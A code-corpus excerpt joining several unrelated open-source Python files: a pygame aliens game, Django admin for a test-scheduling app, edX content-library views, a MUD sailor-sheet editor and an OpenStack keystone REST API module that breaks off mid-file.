self.facing = -1
def move(self, direction):
if direction: self.facing = direction
self.rect.move_ip(direction*self.speed, 0)
self.rect = self.rect.clamp(SCREENRECT)
if direction < 0:
self.image = self.images[0]
elif direction > 0:
self.image = self.images[1]
self.rect.top = self.origtop - (self.rect.left//self.bounce%2)
def gunpos(self):
pos = self.facing*self.gun_offset + self.rect.centerx
return pos, self.rect.top
class Alien(pygame.sprite.Sprite):
speed = 13
animcycle = 12
images = []
def __init__(self):
pygame.sprite.Sprite.__init__(self, self.containers)
self.image = self.images[0]
self.rect = self.image.get_rect()
self.facing = random.choice((-1,1)) * Alien.speed
self.frame = 0
if self.facing < 0:
self.rect.right = SCREENRECT.right
def update(self):
self.rect.move_ip(self.facing, 0)
if not SCREENRECT.contains(self.rect):
self.facing = -self.facing
self.rect.top = self.rect.bottom + 1
self.rect = self.rect.clamp(SCREENRECT)
self.frame = self.frame + 1
self.image = self.images[self.frame//self.animcycle%3]
class Explosion(pygame.sprite.Sprite):
defaultlife = 12
animcycle = 3
images = []
def __init__(self, actor):
pygame.sprite.Sprite.__init__(self, self.containers)
self.image = self.images[0]
self.rect = self.image.get_rect()
self.life = self.defaultlife
self.rect.center = actor.rect.center
def update(self):
self.life = self.life - 1
self.image = self.images[self.life//self.animcycle%2]
if self.life <= 0: self.kill()
class Shot(pygame.sprite.Sprite):
speed = -11
images = []
def __init__(self, pos):
pygame.sprite.Sprite.__init__(self, self.containers)
self.image = self.images[0]
self.rect = self.image.get_rect()
self.rect.midbottom = pos
def update(self):
self.rect.move_ip(0, self.speed)
if self.rect.top <= 0:
self.kill()
class Bomb(pygame.sprite.Sprite):
speed = 9
images = []
def __init__(self, alien):
pygame.sprite.Sprite.__init__(self, self.containers)
self.image = self.images[0]
self.rect = self.image.get_rect()
self.rect.centerx = alien.rect.centerx
self.rect.bottom = alien.rect.bottom + 5
def update(self):
self.rect.move_ip(0, self.speed)
if self.rect.bottom >= 470:
Explosion(self)
self.kill()
class Score(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.font = pygame.font.Font(None, 20)
self.font.set_italic(1)
self.color = Color('white')
self.lastscore = -1
self.update()
self.rect = self.image.get_rect().move(10, 450)
def update(self):
if SCORE != self.lastscore:
self.lastscore = SCORE
msg = "Score: %d" % SCORE
self.image = self.font.render(msg, 0, self.color)
def main(winstyle = 0):
# Initialize pygame
pygame.init()
if pygame.mixer and not pygame.mixer.get_init():
print ('Warning, no sound')
pygame.mixer = None
# Set the display mode
winstyle = 0 # |FULLSCREEN
bestdepth = pygame.display.mode_ok(SCREENRECT.size, winstyle, 32)
screen = pygame.display.set_mode(SCREENRECT.size, winstyle, bestdepth)
#Load images, assign to sprite classes
#(do this before the classes are used, after screen setup)
img = load_image('player1.gif')
Player.images = [img, pygame.transform.flip(img, 1, 0)]
img = load_image('explosion1.gif')
Explosion.images = [img, pygame.transform.flip(img, 1, 1)]
Alien.images = load_images('alien1.gif', 'alien2.gif', 'alien3.gif')
Bomb.images = [load_image('bomb.gif')]
Shot.images = [load_image('shot.gif')]
#decorate the game window
icon = pygame.transform.scale(Alien.images[0], (32, 32))
pygame.display.set_icon(icon)
pygame.display.set_caption('Pygame Aliens')
pygame.mouse.set_visible(0)
#create the background, tile the bgd image
bgdtile = load_image('background.gif')
background = pygame.Surface(SCREENRECT.size)
for x in range(0, SCREENRECT.width, bgdtile.get_width()):
background.blit(bgdtile, (x, 0))
screen.blit(background, (0,0))
pygame.display.flip()
#load the sound effects
boom_sound = load_sound('boom.wav')
shoot_sound = load_sound('car_door.wav')
if pygame.mixer and pygame.mixer.music:
music = os.path.join('data', 'house_lo.wav')
pygame.mixer.music.load(music)
pygame.mixer.music.play(-1)
# Initialize Game Groups
aliens = pygame.sprite.Group()
shots = pygame.sprite.Group()
bombs = pygame.sprite.Group()
all = pygame.sprite.RenderUpdates()
lastalien = pygame.sprite.GroupSingle()
#assign default groups to each sprite class
Player.containers = all
Alien.containers = aliens, all, lastalien
Shot.containers = shots, all
Bomb.containers = bombs, all
Explosion.containers = all
Score.containers = all
#Create Some Starting Values
alienreload = ALIEN_RELOAD
kills = 0
clock = pygame.time.Clock()
#initialize our starting sprites
global SCORE
player = Player()
Alien() #note, this 'lives' because it goes into a sprite group
if pygame.font:
all.add(Score())
while player.alive():
#get input
for event in pygame.event.get():
if event.type == QUIT or \
(event.type == KEYDOWN and event.key == K_ESCAPE):
return
keystate = pygame.key.get_pressed()
# clear/erase the last drawn sprites
all.clear(screen, background)
#update all the sprites
all.update()
#handle player input
direction = keystate[K_RIGHT] - keystate[K_LEFT]
player.move(direction)
firing = keystate[K_SPACE]
if not player.reloading and firing and len(shots) < MAX_SHOTS:
Shot(player.gunpos())
shoot_sound.play()
player.reloading = firing
# Create new alien
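# int(random.random() * ALIEN_ODDS) is 0 with probability 1/ALIEN_ODDS, so once
# the reload timer expires a new alien spawns roughly every ALIEN_ODDS frames.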
if alienreload:
alienreload = alienreload - 1
elif not int(random.random() * ALIEN_ODDS):
Alien()
alienreload = ALIEN_RELOAD
# Drop bombs
if lastalien and not int(random.random() * BOMB_ODDS):
Bomb(lastalien.sprite)
# Detect collisions
for alien in pygame.sprite.spritecollide(player, aliens, 1):
boom_sound.play()
Explosion(alien)
Explosion(player)
SCORE = SCORE + 1
player.kill()
for alien in pygame.sprite.groupcollide(shots, aliens, 1, 1).keys():
boom_sound.play()
Explosion(alien)
SCORE = SCORE + 1
for bomb in pygame.sprite.spritecollide(player, bombs, 1):
boom_sound.play()
Explosion(player)
Explosion(bomb)
player.kill()
#draw the scene
dirty = all.draw(screen)
pygame.display.update(dirty)
#cap the framerate
clock.tick(40)
if pygame.mixer and pygame.mixer.music:
pygame.mixer.music.fadeout(1000)
pygame.time.wait(1000)
#call the "main" function if running this script
if __name__ == '__main__': main()
|
gpl-3.0
|
lhellebr/GreenTea
|
apps/core/admin.py
|
2
|
10226
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Pavel Studenik
# Email: [email protected]
# Date: 24.9.2013
import reversion
from django.contrib import admin
from django.core.urlresolvers import reverse
from models import (Arch, Author, CheckProgress, Distro, DistroTemplate, Event,
FileLog, Git, GroupOwner, GroupTaskTemplate, GroupTemplate,
GroupTestTemplate, Job, JobTemplate, PhaseLabel,
PhaseResult, Recipe, RecipeTemplate, System, Task,
TaskRoleEnum, TaskTemplate, Test, TestHistory)
class TemplateTaskInLine(admin.TabularInline):
model = TaskTemplate
raw_id_fields = ("test", )
sortable_field_name = "priority"
ordering = ["position", "priority"]
extra = 0
class RecipeInLine(admin.TabularInline):
model = Recipe
extra = 0
fields = ["get_recipe_link", "whiteboard", "status",
"system", "arch", "distro", "result", "resultrate"]
readonly_fields = ["get_recipe_link", "status",
"system", "arch", "distro", "result", "resultrate"]
def get_recipe_link(self, obj):
url = reverse('admin:core_recipe_change', args=(obj.pk,))
return '<a href="%s">%s</a>' % (url, obj.uid)
get_recipe_link.allow_tags = True
class RecipeTemplateInLineSmall(admin.TabularInline):
model = RecipeTemplate
extra = 0
fields = ("get_recipe_link", "is_enabled", "name",
"is_virtualguest", ("role", "arch"), "distro",)
readonly_fields = ("get_recipe_link", "is_enabled", "arch")
def is_enabled(self, obj):
return obj.is_enabled()
is_enabled.boolean = True
def get_recipe_link(self, obj):
url = reverse('admin:core_recipetemplate_change', args=(obj.pk,))
return '<a href="%s">%s</a>' % (url, obj.id)
get_recipe_link.allow_tags = True
class RecipeTemplateInLine(RecipeTemplateInLineSmall):
fields = ("get_recipe_link", "name", "is_virtualguest",
"role", "arch", "distro", "schedule")
readonly_fields = ("get_recipe_link", )
class TaskInLine(admin.TabularInline):
model = Task
extra = 0
fields = ("uid", "test", "status",
"result", "duration", "datestart", "alias")
readonly_fields = fields
class DistroTemplateAdmin(reversion.VersionAdmin):
list_display = ("name", "distroname",
"variant", "family", "tpljobs_counter")
ordering = ("name",)
inlines = [RecipeTemplateInLineSmall]
class JobAdmin(admin.ModelAdmin):
list_display = ("uid", "template", "date", "is_running", )
search_fields = ["uid", "template__whiteboard"]
ordering = ["-date", "-is_running", ]
inlines = [RecipeInLine]
class RecipeAdmin(admin.ModelAdmin):
list_display = ("uid", "get_job_link", "whiteboard", "get_template",
"get_system_link", "result", "status", "resultrate")
search_fields = ["uid", "whiteboard"]
raw_id_fields = ("job", "system", "distro", "parentrecipe")
# readonly_fields = ("job", "system", "distro")
inlines = [TaskInLine]
def get_system_link(self, obj):
url = reverse('admin:core_system_change', args=(obj.system_id,))
return '<a href="%s">%s</a>' % (url, obj.system)
get_system_link.allow_tags = True
def get_job_link(self, obj):
url = reverse('admin:core_job_change', args=(obj.job_id,))
return '<a href="%s">%s</a>' % (url, obj.job)
get_job_link.allow_tags = True
class TaskAdmin(admin.ModelAdmin):
list_display = ("uid", "recipe", "test", "status",
"duration", "datestart", "result")
search_fields = ["uid"]
raw_id_fields = ("recipe", "test")
class TaskTemplateInLine(admin.TabularInline):
model = TaskTemplate
extra = 0
fields = ("get_recipetemplate_link", "jobtemplate")
readonly_fields = fields
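# Limit the inline to task templates whose parent job template is enabled.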
def get_queryset(self, request):
qs = super(TaskTemplateInLine, self).get_queryset(request)
return qs.filter(recipe__jobtemplate__is_enable=True)
def jobtemplate(self, obj):
return "%s" % obj.recipe.jobtemplate
def get_recipetemplate_link(self, obj):
url = reverse('admin:core_recipetemplate_change',
args=(obj.recipe.pk,))
return '<a href="%s">%s</a>' % (url, obj.recipe.id)
get_recipetemplate_link.allow_tags = True
class TestAdmin(admin.ModelAdmin):
list_display = ("name", "owner", "is_enable")
search_fields = ["name", "owner__email"]
filter_horizontal = ["dependencies", "groups"]
def ownerName(self, obj):
return obj.owner.name
def ownerEmail(self, obj):
return obj.owner.email
inlines = [TaskTemplateInLine]
class TestHistoryAdmin(admin.ModelAdmin):
list_display = ("test", "author", "commit", "date")
class AuthorAdmin(admin.ModelAdmin):
list_display = ("name", "is_enabled", "email")
class CheckProgressAdmin(admin.ModelAdmin):
list_display = ("datestart", "dateend",
"percent", "totalsum", "get_duration")
class GitAdmin(admin.ModelAdmin):
list_display = ("name", "url", "localurl", "get_count")
class JobTemplateAdmin(admin.ModelAdmin):
list_display = (
"whiteboard", "is_enable", "schedule", "get_tags", "position")
def make_enable(modeladmin, request, queryset):
queryset.update(is_enable=True)
make_enable.short_description = "Set selected templates to enabled"
def make_disable(modeladmin, request, queryset):
queryset.update(is_enable=False)
make_disable.short_description = "Set selected templates to disabled"
def make_clone(modeladmin, request, queryset):
for it in queryset:
it.clone()
make_clone.short_description = "Clone selected jobs"
actions = [make_enable, make_disable, make_clone]
# 'position' is the name of the model field which holds the position of an element
list_editable = ('position',)
list_filter = ["schedule", "is_enable"]
search_fields = ["whiteboard", ]
ordering = ["-is_enable", "schedule", "position"]
inlines = [RecipeTemplateInLine]
class GroupTestInLine(admin.TabularInline):
model = GroupTestTemplate
extra = 0
raw_id_fields = ("test", )
sortable_field_name = "priority"
ordering = ["priority"]
class GroupRecipeTemplateInLine(admin.TabularInline):
model = GroupTaskTemplate
fields = ("get_recipe_link", "recipe", "jobtemplate")
readonly_fields = fields
extra = 0
def jobtemplate(self, obj):
return obj.recipe.jobtemplate
def get_recipe_link(self, obj):
url = reverse('admin:core_recipetemplate_change',
args=(obj.recipe.pk,))
return '<a href="%s">%s</a>' % (url, obj.recipe.id)
get_recipe_link.allow_tags = True
class GroupTaskInLine(admin.TabularInline):
model = GroupTaskTemplate
extra = 0
sortable_field_name = "priority"
fields = ("get_group_link", "group", "params", "role", "priority",)
readonly_fields = ("get_group_link", )
def get_group_link(self, obj):
url = reverse('admin:core_grouptemplate_change', args=(obj.group.pk,))
return '<a href="%s">%s</a>' % (url, obj.group.id)
get_group_link.allow_tags = True
class GroupTemplateAdmin(admin.ModelAdmin):
search_fields = ["name", ]
inlines = [GroupTestInLine, GroupRecipeTemplateInLine]
def make_clone(modeladmin, request, queryset):
for it in queryset:
it.clone()
make_clone.short_description = "Clone selected groups"
actions = [make_clone, ]
class GroupOwnerAdmin(admin.ModelAdmin):
filter_horizontal = ["owners", ]
class TaskTemplateAdmin(admin.ModelAdmin):
list_display = ("id", "test", "recipe")
class RecipeTemplateAdmin(admin.ModelAdmin):
list_display = ("__unicode__", "jobtemplate", "distro", "archs", "hvm")
inlines = [GroupTaskInLine, TemplateTaskInLine]
search_fields = ["name", "jobtemplate__whiteboard"]
readonly_fields = ("get_jobtemplate_link", )
fieldsets = (
(None, {
'fields': (('get_jobtemplate_link', 'jobtemplate'), 'name', ('distro', 'arch',), 'hvm', ('is_virtualguest', 'virtualhost'),
'role', 'memory', 'disk', 'hostname', 'params', 'schedule')
}),
('Kernel options', {
'fields': ('kernel_options', 'kernel_options_post', 'ks_meta',),
}),
)
def get_jobtemplate_link(self, obj):
url = reverse('admin:core_jobtemplate_change',
args=(obj.jobtemplate.pk,))
return '<a href="%s">%s</a>' % (url, obj.jobtemplate)
get_jobtemplate_link.allow_tags = True
def render_change_form(self, request, context, *args, **kwargs):
if kwargs.get("obj", None):
context['adminform'].form.fields['virtualhost'].queryset = RecipeTemplate.objects\
.filter(jobtemplate=kwargs["obj"].jobtemplate, is_virtualguest=False)\
.exclude(id=kwargs["obj"].id)
return super(RecipeTemplateAdmin, self).render_change_form(
request, context, args, kwargs)
class FileLogAdmin(admin.ModelAdmin):
list_display = ("recipe", "task", "path", "created",
"is_downloaded", "is_indexed", "status_code")
raw_id_fields = ("recipe", "task")
admin.site.register(Job, JobAdmin)
admin.site.register(Recipe, RecipeAdmin)
admin.site.register(PhaseResult)
admin.site.register(PhaseLabel)
admin.site.register(Test, TestAdmin)
admin.site.register(Task, TaskAdmin)
admin.site.register(System)
admin.site.register(Arch)
admin.site.register(Event)
admin.site.register(Distro)
admin.site.register(Git, GitAdmin)
admin.site.register(Author, AuthorAdmin)
admin.site.register(TestHistory, TestHistoryAdmin)
admin.site.register(GroupOwner, GroupOwnerAdmin)
admin.site.register(TaskTemplate, TaskTemplateAdmin)
admin.site.register(TaskRoleEnum)
admin.site.register(FileLog, FileLogAdmin)
admin.site.register(JobTemplate, JobTemplateAdmin)
admin.site.register(GroupTemplate, GroupTemplateAdmin)
admin.site.register(RecipeTemplate, RecipeTemplateAdmin)
admin.site.register(DistroTemplate, DistroTemplateAdmin)
admin.site.register(CheckProgress, CheckProgressAdmin)
|
gpl-2.0
|
Edraak/edraak-platform
|
cms/djangoapps/contentstore/views/library.py
|
14
|
10232
|
"""
Views related to content libraries.
A content library is a structure containing XBlocks which can be re-used in
multiple courses.
"""
from __future__ import absolute_import
import logging
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.http import Http404, HttpResponseForbidden, HttpResponseNotAllowed
from django.utils.translation import ugettext as _
from django.views.decorators.csrf import ensure_csrf_cookie
from django.views.decorators.http import require_http_methods
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from opaque_keys.edx.locator import LibraryLocator, LibraryUsageLocator
from six import text_type
from contentstore.utils import add_instructor, reverse_library_url
from contentstore.views.item import create_xblock_info
from course_creators.views import get_course_creator_status
from edxmako.shortcuts import render_to_response
from student.auth import (
STUDIO_EDIT_ROLES,
STUDIO_VIEW_USERS,
get_user_permissions,
has_studio_read_access,
has_studio_write_access
)
from student.roles import CourseInstructorRole, CourseStaffRole, LibraryUserRole
from util.json_request import JsonResponse, JsonResponseBadRequest, expect_json
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.exceptions import DuplicateCourseError
from .component import CONTAINER_TEMPLATES, get_component_templates
from .user import user_with_role
__all__ = ['library_handler', 'manage_library_users']
log = logging.getLogger(__name__)
LIBRARIES_ENABLED = settings.FEATURES.get('ENABLE_CONTENT_LIBRARIES', False)
def get_library_creator_status(user):
"""
Helper method for returning the library creation status for a particular user,
taking into account the value LIBRARIES_ENABLED.
"""
if not LIBRARIES_ENABLED:
return False
elif user.is_staff:
return True
elif settings.FEATURES.get('ENABLE_CREATOR_GROUP', False):
return get_course_creator_status(user) == 'granted'
else:
# EDUCATOR-1924: DISABLE_LIBRARY_CREATION overrides DISABLE_COURSE_CREATION, if present.
disable_library_creation = settings.FEATURES.get('DISABLE_LIBRARY_CREATION', None)
disable_course_creation = settings.FEATURES.get('DISABLE_COURSE_CREATION', False)
if disable_library_creation is not None:
return not disable_library_creation
else:
return not disable_course_creation
@login_required
@ensure_csrf_cookie
@require_http_methods(('GET', 'POST'))
def library_handler(request, library_key_string=None):
"""
RESTful interface to most content library related functionality.
"""
if not LIBRARIES_ENABLED:
log.exception("Attempted to use the content library API when the libraries feature is disabled.")
raise Http404 # Should never happen because we test the feature in urls.py also
if request.method == 'POST':
if not get_library_creator_status(request.user):
return HttpResponseForbidden()
if library_key_string is not None:
return HttpResponseNotAllowed(("POST",))
return _create_library(request)
else:
if library_key_string:
return _display_library(library_key_string, request)
return _list_libraries(request)
def _display_library(library_key_string, request):
"""
Displays single library
"""
library_key = CourseKey.from_string(library_key_string)
if not isinstance(library_key, LibraryLocator):
log.exception("Non-library key passed to content libraries API.") # Should never happen due to url regex
raise Http404 # This is not a library
if not has_studio_read_access(request.user, library_key):
log.exception(
u"User %s tried to access library %s without permission",
request.user.username, unicode(library_key)
)
raise PermissionDenied()
library = modulestore().get_library(library_key)
if library is None:
log.exception(u"Library %s not found", unicode(library_key))
raise Http404
response_format = 'html'
if (
request.GET.get('format', 'html') == 'json' or
'application/json' in request.META.get('HTTP_ACCEPT', 'text/html')
):
response_format = 'json'
return library_blocks_view(library, request.user, response_format)
def _list_libraries(request):
"""
List all accessible libraries
"""
lib_info = [
{
"display_name": lib.display_name,
"library_key": unicode(lib.location.library_key),
}
for lib in modulestore().get_libraries()
if has_studio_read_access(request.user, lib.location.library_key)
]
return JsonResponse(lib_info)
@expect_json
def _create_library(request):
"""
Helper method for creating a new library.
"""
display_name = None
try:
display_name = request.json['display_name']
org = request.json['org']
library = request.json.get('number', None)
if library is None:
library = request.json['library']
store = modulestore()
with store.default_store(ModuleStoreEnum.Type.split):
new_lib = store.create_library(
org=org,
library=library,
user_id=request.user.id,
fields={"display_name": display_name},
)
# Give the user admin ("Instructor") role for this library:
add_instructor(new_lib.location.library_key, request.user, request.user)
except KeyError as error:
log.exception("Unable to create library - missing required JSON key.")
return JsonResponseBadRequest({
"ErrMsg": _("Unable to create library - missing required field '{field}'").format(field=text_type(error))
})
except InvalidKeyError as error:
log.exception("Unable to create library - invalid key.")
return JsonResponseBadRequest({
"ErrMsg": _("Unable to create library '{name}'.\n\n{err}").format(name=display_name, err=text_type(error))
})
except DuplicateCourseError:
log.exception("Unable to create library - one already exists with the same key.")
return JsonResponseBadRequest({
'ErrMsg': _(
'There is already a library defined with the same '
'organization and library code. Please '
'change your library code so that it is unique within your organization.'
)
})
lib_key_str = unicode(new_lib.location.library_key)
return JsonResponse({
'url': reverse_library_url('library_handler', lib_key_str),
'library_key': lib_key_str,
})
def library_blocks_view(library, user, response_format):
"""
The main view of a course's content library.
Shows all the XBlocks in the library, and allows adding/editing/deleting
them.
Can be called with response_format="json" to get a JSON-formatted list of
the XBlocks in the library along with library metadata.
Assumes that read permissions have been checked before calling this.
"""
assert isinstance(library.location.library_key, LibraryLocator)
assert isinstance(library.location, LibraryUsageLocator)
children = library.children
if response_format == "json":
# The JSON response for this request is short and sweet:
prev_version = library.runtime.course_entry.structure['previous_version']
return JsonResponse({
"display_name": library.display_name,
"library_id": unicode(library.location.library_key),
"version": unicode(library.runtime.course_entry.course_key.version_guid),
"previous_version": unicode(prev_version) if prev_version else None,
"blocks": [unicode(x) for x in children],
})
can_edit = has_studio_write_access(user, library.location.library_key)
xblock_info = create_xblock_info(library, include_ancestor_info=False, graders=[])
component_templates = get_component_templates(library, library=True) if can_edit else []
return render_to_response('library.html', {
'can_edit': can_edit,
'context_library': library,
'component_templates': component_templates,
'xblock_info': xblock_info,
'templates': CONTAINER_TEMPLATES,
})
def manage_library_users(request, library_key_string):
"""
Studio UI for editing the users within a library.
Uses the /course_team/:library_key/:user_email/ REST API to make changes.
"""
library_key = CourseKey.from_string(library_key_string)
if not isinstance(library_key, LibraryLocator):
raise Http404 # This is not a library
user_perms = get_user_permissions(request.user, library_key)
if not user_perms & STUDIO_VIEW_USERS:
raise PermissionDenied()
library = modulestore().get_library(library_key)
if library is None:
raise Http404
# Segment all the users explicitly associated with this library, ensuring each user only has one role listed:
instructors = set(CourseInstructorRole(library_key).users_with_role())
staff = set(CourseStaffRole(library_key).users_with_role()) - instructors
users = set(LibraryUserRole(library_key).users_with_role()) - instructors - staff
formatted_users = []
for user in instructors:
formatted_users.append(user_with_role(user, 'instructor'))
for user in staff:
formatted_users.append(user_with_role(user, 'staff'))
for user in users:
formatted_users.append(user_with_role(user, 'library_user'))
return render_to_response('manage_users_lib.html', {
'context_library': library,
'users': formatted_users,
'allow_actions': bool(user_perms & STUDIO_EDIT_ROLES),
'library_key': unicode(library_key),
'lib_users_url': reverse_library_url('manage_library_users', library_key_string),
'show_children_previews': library.show_children_previews
})
|
agpl-3.0
|
vlegoff/tsunami
|
src/secondaires/navigation/editeurs/matedit/__init__.py
|
1
|
5288
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Package contenant l'éditeur 'matedit'.
Si des redéfinitions de contexte-éditeur standard doivent être faites, elles
seront placées dans ce package
Note importante : ce package contient la définition d'un éditeur, mais
celui-ci peut très bien être étendu par d'autres modules. Au quel cas,
les extensions n'apparaîtront pas ici.
"""
from primaires.interpreteur.editeur.description import Description
from primaires.interpreteur.editeur.entier import Entier
from primaires.interpreteur.editeur.presentation import Presentation
from primaires.interpreteur.editeur.uniligne import Uniligne
from .edt_aptitudes import EdtAptitudes
class EdtMatedit(Presentation):
"""Classe définissant l'éditeur de fiche de matelot 'matedit'."""
nom = "matedit"
def __init__(self, personnage, fiche):
"""Constructeur de l'éditeur"""
if personnage:
instance_connexion = personnage.instance_connexion
else:
instance_connexion = None
Presentation.__init__(self, instance_connexion, fiche)
if personnage and fiche:
self.construire(fiche)
def __getnewargs__(self):
return (None, None)
def construire(self, fiche):
"""Construction de l'éditeur"""
# Singular name
singulier = self.ajouter_choix("nom singulier", "n", Uniligne,
fiche, "nom_singulier")
singulier.parent = self
singulier.prompt = "Nom singulier avec déterminant : "
singulier.apercu = "{objet.nom_singulier}"
singulier.aide_courte = \
"Entrez le |ent|nom singulier|ff| du matelot ou |cmd|/|ff| " \
"pour revenir à la fenêtre parente.\n\nNom singulier actuel : " \
"|bc|{objet.nom_singulier}|ff|"
# Plural name
pluriel = self.ajouter_choix("nom pluriel", "p", Uniligne,
fiche, "nom_pluriel")
pluriel.parent = self
pluriel.prompt = "Nom pluriel sans déterminant : "
pluriel.apercu = "{objet.nom_pluriel}"
pluriel.aide_courte = \
"Entrez le |ent|nom pluriel|ff| du matelot ou |cmd|/|ff| " \
"pour revenir à la fenêtre parente.\n\nNom pluriel actuel : " \
"|bc|{objet.nom_pluriel}|ff|"
# Description
description = self.ajouter_choix("description", "d", Description,
fiche)
description.parent = self
description.apercu = "{objet.description.paragraphes_indentes}"
description.aide_courte = \
"| |tit|" + "Description de la fiche de matelot {}".format(
fiche.cle).ljust(76) + "|ff||\n" + self.opts.separateur
# Default post
poste = self.ajouter_choix("poste par défaut", "t", Uniligne,
fiche, "poste_defaut")
poste.parent = self
poste.prompt = "Nom du poste par défaut du matelot : "
poste.apercu = "{objet.poste_defaut}"
poste.aide_courte = \
"Entrez le |ent|nom du poste|ff| du matelot ou |cmd|/|ff| " \
"pour revenir à la fenêtre parente.\n\nPoste actuel : " \
"|bc|{objet.poste_defaut}|ff|"
# Aptitudes
aptitudes = self.ajouter_choix("aptitudes", "a", EdtAptitudes,
fiche)
aptitudes.parent = self
# Unit price
prix = self.ajouter_choix("prix unitaire", "u", Entier, fiche,
"m_valeur")
prix.parent = self
prix.apercu = "{objet.m_valeur} pièces de bronze"
prix.prompt = "Entrez le prix du matelot : "
prix.aide_courte = \
"Entrez |ent|le prix|ff| du matelot.\n\nPrix actuel : " \
"{objet.m_valeur} pièces de bronze"
|
bsd-3-clause
|
kogotko/carburetor
|
openstack_dashboard/api/rest/keystone.py
|
1
|
19555
|
# Copyright 2014, Rackspace, US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""API over the keystone service.
"""
from django.conf import settings
import django.http
from django.views import generic
from openstack_dashboard import api
from openstack_dashboard.api.rest import urls
from openstack_dashboard.api.rest import utils as rest_utils
@urls.register
class Version(generic.View):
"""API for active keystone version.
"""
url_regex = r'keystone/version/$'
@rest_utils.ajax()
def get(self, request):
"""Get active keystone version.
"""
return {'version': str(api.keystone.get_version())}
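# Example response (a sketch; on a keystone v3 deployment the active
# version is 3, so the payload would be {'version': '3'}).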
@urls.register
class Users(generic.View):
"""API for keystone users.
"""
url_regex = r'keystone/users/$'
client_keywords = {'project_id', 'domain_id', 'group_id'}
@rest_utils.ajax()
def get(self, request):
"""Get a list of users.
By default, a listing of all users for the current domain is
returned. You may specify GET parameters for project_id, domain_id and
group_id to change that listing's context.
The listing result is an object with property "items".
"""
domain_context = request.session.get('domain_context')
filters = rest_utils.parse_filters_kwargs(request,
self.client_keywords)[0]
if len(filters) == 0:
filters = None
result = api.keystone.user_list(
request,
project=request.GET.get('project_id'),
domain=request.GET.get('domain_id', domain_context),
group=request.GET.get('group_id'),
filters=filters
)
return {'items': [u.to_dict() for u in result]}
@rest_utils.ajax(data_required=True)
def post(self, request):
"""Create a user.
Create a user using the parameters supplied in the POST
application/json object. The base parameters are name (string), email
(string, optional), password (string, optional), project_id (string,
optional), enabled (boolean, defaults to true). The user will be
created in the default domain.
This action returns the new user object on success.
"""
domain = api.keystone.get_default_domain(request)
new_user = api.keystone.user_create(
request,
name=request.DATA['name'],
email=request.DATA.get('email') or None,
password=request.DATA.get('password'),
project=request.DATA.get('project_id') or None,
enabled=True,
domain=domain.id
)
return rest_utils.CreatedResponse(
'/api/keystone/users/%s' % new_user.id,
new_user.to_dict()
)
@rest_utils.ajax(data_required=True)
def delete(self, request):
"""Delete multiple users by id.
The DELETE data should be an application/json array of user ids to
delete.
This method returns HTTP 204 (no content) on success.
"""
for user_id in request.DATA:
if user_id != request.user.id:
api.keystone.user_delete(request, user_id)
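# Example DELETE payload (illustrative ids):
#     ["3fa85f64b5f34ab8", "9bc2de77aa004c11"]
# Ids matching the requesting user are skipped, so users cannot delete
# themselves through this endpoint.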
@urls.register
class User(generic.View):
"""API for a single keystone user.
"""
url_regex = r'keystone/users/(?P<id>[0-9a-f]+|current)$'
@rest_utils.ajax()
def get(self, request, id):
"""Get a specific user by id.
If the id supplied is 'current' then the current logged-in user
will be returned, otherwise the user specified by the id.
"""
if id == 'current':
id = request.user.id
return api.keystone.user_get(request, id).to_dict()
@rest_utils.ajax()
def delete(self, request, id):
"""Delete a single user by id.
This method returns HTTP 204 (no content) on success.
"""
if id == 'current':
raise rest_utils.AjaxError(404, 'current')
api.keystone.user_delete(request, id)
@rest_utils.ajax(data_required=True)
def patch(self, request, id):
"""Update a single user.
The PATCH data should be an application/json object with attributes to
set to new values: password (string), project (string),
enabled (boolean).
A PATCH may contain any one of those attributes, but
if it contains more than one it must contain the project, even
if it is not being altered.
This method returns HTTP 204 (no content) on success.
"""
keys = tuple(request.DATA)
user = api.keystone.user_get(request, id)
if 'password' in keys:
password = request.DATA['password']
api.keystone.user_update_password(request, user, password)
elif 'enabled' in keys:
enabled = request.DATA['enabled']
api.keystone.user_update_enabled(request, user, enabled)
else:
# note that project is actually project_id
# but we can not rename due to legacy compatibility
# refer to keystone.api user_update method
api.keystone.user_update(request, user, **request.DATA)
@urls.register
class Roles(generic.View):
"""API over all roles.
"""
url_regex = r'keystone/roles/$'
@rest_utils.ajax()
def get(self, request):
"""Get a list of roles.
